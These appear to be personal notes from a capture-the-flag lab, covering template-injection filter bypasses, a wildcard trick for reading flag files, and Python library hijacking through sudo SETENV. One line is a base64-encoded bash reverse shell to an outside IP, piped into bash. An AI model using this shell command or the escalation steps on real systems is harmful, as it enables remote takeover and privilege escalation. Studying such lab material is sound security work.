1. Completed VulnNet: dotpy
    1. Learned about SSTI filter bypasses
    2. Also, don't underestimate the power of encoding your commands
      1. echo%20YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNC43OC84MCAwPiYx|base64%20-d|bash
      2. This was the command used to get the reverse shell
    3. Sometimes, if there are files with extensions, (eg: flag.txt) but the '.' character (period sign) is blocked, try using the wildcard character '*'
      1. cat flag*
      2. This will cat out all the files that starts with 'flag'. So automatically, the flag.txt file will also be printed.
    4. Python Library hijacking

      1. Using SETENV

        Untitled

        1. If we are allowed to SETENV using SUDO, we may be able to escalate privileges.
        2. Python uses a set directory order in which it searches for the modules when importing them.
        3. We can use SETENV to change the PYTHONPATH variable to something like /dev/shm where we can put a malicious file with the name of the imported module (eg: sys.py, requests.py, etc)
        4. To change the PYTHONPATH and execute, we can use sudo PYTHONPATH=/dev/shm /usr/bin/python3 /opt/backup.py